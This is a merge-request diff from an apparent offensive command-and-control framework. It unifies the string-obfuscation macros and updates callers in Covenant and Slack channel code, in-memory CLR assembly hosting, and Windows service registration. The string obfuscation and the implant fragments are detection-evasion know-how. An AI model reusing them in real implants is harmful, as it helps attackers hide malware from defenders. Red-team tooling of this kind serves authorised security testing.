Merge branch 'ObfuscationProposal' into 'Obfuscation'

OBF will support both char and wchar_t

See merge request C3/C3!172

Src/Common/ADVobfuscator/MetaString.h

@@ -92,19 +92,17 @@ namespace andrivet::ADVobfuscator
 
 	template<std::make_unsigned_t<wchar_t> Seed, std::make_unsigned_t<wchar_t> Multiplier, typename Indexes>
 	using XorWString = XorStringT<wchar_t, Seed, Multiplier, Indexes>;
+
+	template <typename T>
+	using PeelT = std::remove_const_t<std::remove_all_extents_t<std::remove_reference_t<T>>>;
 }
 
+namespace Obfuscator = andrivet::ADVobfuscator;
+
 // Prefix notation
-#define DEF_OBFUSCATED(str) andrivet::ADVobfuscator::XorString<andrivet::ADVobfuscator::MetaRandomKey<char, __COUNTER__>, andrivet::ADVobfuscator::MetaRandomKey<char, __COUNTER__>, std::make_index_sequence<sizeof(str) - 1>>(str)
-#define DEF_OBFUSCATED_W(str) andrivet::ADVobfuscator::XorWString<andrivet::ADVobfuscator::MetaRandomKey<wchar_t, __COUNTER__>, andrivet::ADVobfuscator::MetaRandomKey<wchar_t, __COUNTER__>, std::make_index_sequence<sizeof(str)/(sizeof(wchar_t)) - 1>>(str)
-
+#define DEF_OBFUSCATED(str) Obfuscator::XorStringT<Obfuscator::PeelT<decltype(str)>, Obfuscator::MetaRandomKey<Obfuscator::PeelT<decltype(str)>, __COUNTER__>, Obfuscator::MetaRandomKey<Obfuscator::PeelT<decltype(str)>, __COUNTER__>, std::make_index_sequence<sizeof(str)/(sizeof(Obfuscator::PeelT<decltype(str)>)) - 1>>{ str }
 #define OBF(str) (DEF_OBFUSCATED(str).decrypt())
-#define OBF_W(str) (DEF_OBFUSCATED_W(str).decrypt())
-
-#define OBF_STR(str) (std::string{DEF_OBFUSCATED(str).decrypt()})
-#define OBF_WSTR(str) (std::wstring{DEF_OBFUSCATED_W(str).decrypt()})
-
-#define OBF_SEC(str) (MWR::SecureString{DEF_OBFUSCATED(str).decrypt()})
-#define OBF_WSEC(str) (MWR::SecureWString{DEF_OBFUSCATED_W(str).decrypt()})
+#define OBF_STR(str) (std::basic_string<Obfuscator::PeelT<decltype(str)>>{ OBF(str) })
+#define OBF_SEC(str) (MWR::BasicSecureString<Obfuscator::PeelT<decltype(str)>>{ OBF(str) })
 
 #endif

Src/Common/MWR/C3/Interfaces/Connectors/Covenant.cpp

@@ -156,7 +156,7 @@ bool MWR::C3::Interfaces::Connectors::Covenant::UpdateListenerId()
 	request = web::http::http_request(web::http::methods::GET);
 
 	std::string authHeader = OBF("Bearer ") + this->m_token;
-	request.headers().add(OBF_W(L"Authorization"), utility::conversions::to_string_t(authHeader));
+	request.headers().add(OBF(L"Authorization"), utility::conversions::to_string_t(authHeader));
 	pplx::task<web::http::http_response> task = webClient.request(request);
 
 	web::http::http_response resp = task.get();
@@ -250,7 +250,7 @@ MWR::C3::Interfaces::Connectors::Covenant::Covenant(ByteView arguments)
 		request.headers().set_content_type(utility::conversions::to_string_t(OBF("application/x-www-form-urlencoded")));
 
 		std::string authHeader = OBF("Bearer ") + this->m_token;
-		request.headers().add(OBF_W(L"Authorization"), utility::conversions::to_string_t(authHeader));
+		request.headers().add(OBF(L"Authorization"), utility::conversions::to_string_t(authHeader));
 
 		std::string createBridgeString = "Id=0&GUID=b85ea642f2&ListenerTypeId=2&Status=Active&CovenantToken=&Description=A+Bridge+for+custom+listeners.&Name=C3Bridge&BindAddress=0.0.0.0&BindPort=" + \
 			std::to_string(this->m_ListeningPostPort) + "&ConnectPort=" + std::to_string(this->m_ListeningPostPort) + "&ConnectAddresses%5B0%5D=" + \
@@ -342,7 +342,7 @@ MWR::ByteVector MWR::C3::Interfaces::Connectors::Covenant::GeneratePayload(ByteV
 		request.headers().set_content_type(utility::conversions::to_string_t("application/json"));
 		request.set_body(utility::conversions::to_string_t(postData.dump()));
 
-		request.headers().add(OBF_W(L"Authorization"), utility::conversions::to_string_t(authHeader));
+		request.headers().add(OBF(L"Authorization"), utility::conversions::to_string_t(authHeader));
 		pplx::task<web::http::http_response> task = webClient.request(request);
 		web::http::http_response resp = task.get();
 

Src/Common/MWR/C3/Interfaces/Peripherals/Grunt.cpp

@@ -32,7 +32,7 @@ static void RuntimeV4Host(PBYTE pbAssembly, SIZE_T assemblyLen)
 		goto Cleanup;
 	}
 
-	hr = pMetaHost->GetRuntime(OBF_W(L"v4.0.30319"), IID_PPV_ARGS(&pRuntimeInfo));
+	hr = pMetaHost->GetRuntime(OBF(L"v4.0.30319"), IID_PPV_ARGS(&pRuntimeInfo));
 	if (FAILED(hr))
 	{
 		goto Cleanup;
@@ -62,7 +62,7 @@ static void RuntimeV4Host(PBYTE pbAssembly, SIZE_T assemblyLen)
 		goto Cleanup;
 	}
 
-	hr = pCorRuntimeHost->CreateDomain(OBF_W(L"AppDomain"), NULL, &spAppDomainThunk);
+	hr = pCorRuntimeHost->CreateDomain(OBF(L"AppDomain"), NULL, &spAppDomainThunk);
 	if (FAILED(hr))
 	{
 		goto Cleanup;

Src/Common/MWR/Slack/SlackApi.cpp

@@ -8,7 +8,7 @@
 MWR::Slack::Slack(std::string const& token, std::string const& channelName)
 {
 	if (auto winProxy = WinTools::GetProxyConfiguration(); !winProxy.empty())
-		this->m_HttpConfig.set_proxy(winProxy == OBF_W(L"auto") ? web::web_proxy::use_auto_discovery : web::web_proxy(winProxy));
+		this->m_HttpConfig.set_proxy(winProxy == OBF(L"auto") ? web::web_proxy::use_auto_discovery : web::web_proxy(winProxy));
 
 	this->m_Token = token;
 
@@ -278,7 +278,7 @@ json MWR::Slack::SendHttpRequest(std::string const& host, std::string const& con
 		{
 			request = web::http::http_request(web::http::methods::GET);
 		}
-		request.headers().add(OBF_W(L"Authorization"), utility::conversions::to_string_t(authHeader));
+		request.headers().add(OBF(L"Authorization"), utility::conversions::to_string_t(authHeader));
 
 		pplx::task<web::http::http_response> task = webClient.request(request).then([&](web::http::http_response response)
 			{
@@ -328,7 +328,7 @@ std::string MWR::Slack::GetFile(std::string const &url)
 	web::http::client::http_client webClient(utility::conversions::to_string_t(host), this->m_HttpConfig);
 	web::http::http_request request;
 
-	request.headers().add(OBF_W(L"Authorization"), utility::conversions::to_string_t(authHeader));
+	request.headers().add(OBF(L"Authorization"), utility::conversions::to_string_t(authHeader));
 
 	pplx::task<std::string> task = webClient.request(request).then([&](web::http::http_response response)
 		{

Src/Common/MWR/WinTools/Proxy.cpp

@@ -6,7 +6,7 @@ std::wstring MWR::WinTools::GetProxyConfiguration()
 {
 	wchar_t* pValue = nullptr;
 	size_t len = 0;
-	auto err = _wdupenv_s(&pValue, &len, OBF_W(L"http_proxy"));
+	auto err = _wdupenv_s(&pValue, &len, OBF(L"http_proxy"));
 	std::unique_ptr<wchar_t, void(*)(wchar_t*)> holder(pValue, [](wchar_t* p) { free(p); });
 	return (!err && pValue && len) ? std::wstring{ pValue, len - 1 } : std::wstring{};
 }

Src/Common/MWR/WinTools/Services.cpp

@@ -121,7 +121,7 @@ std::pair<MWR::CppCommons::WinTools::Services::Status, HRESULT> MWR::CppCommons:
 void MWR::CppCommons::WinTools::Services::ServiceMain(DWORD argc, LPTSTR* argv)
 {
 	// Register the control request handler
-	if (s_ServiceStatusHandle = RegisterServiceCtrlHandler(OBF_W(TEXT("AdsaServicePoX")), ControlHandler), !s_ServiceStatusHandle)
+	if (s_ServiceStatusHandle = RegisterServiceCtrlHandler(OBF(TEXT("AdsaServicePoX")), ControlHandler), !s_ServiceStatusHandle)
 	{
 		//SvcReportEvent(TEXT("RegisterServiceCtrlHandler")); Windows event viewer
 		return;

Src/NodeRelayConsoleExe/NodeRelayConsoleExe.cpp

@@ -32,7 +32,7 @@ int main(DWORD argc, char * argv[])
 			{
 				// Check if we're run as a Windows Service.
 				NodeRelayService service;
-				if (SUCCEEDED(MWR::CppCommons::WinTools::Services::TryStartAsService(service, OBF_W(L"C3NodeRelayServiceName_Change_That"))))	// TODO: Change that!
+				if (SUCCEEDED(MWR::CppCommons::WinTools::Services::TryStartAsService(service, OBF(L"C3NodeRelayServiceName_Change_That"))))	// TODO: Change that!
 					return;
 
 				// If not then proceed as a user-land application.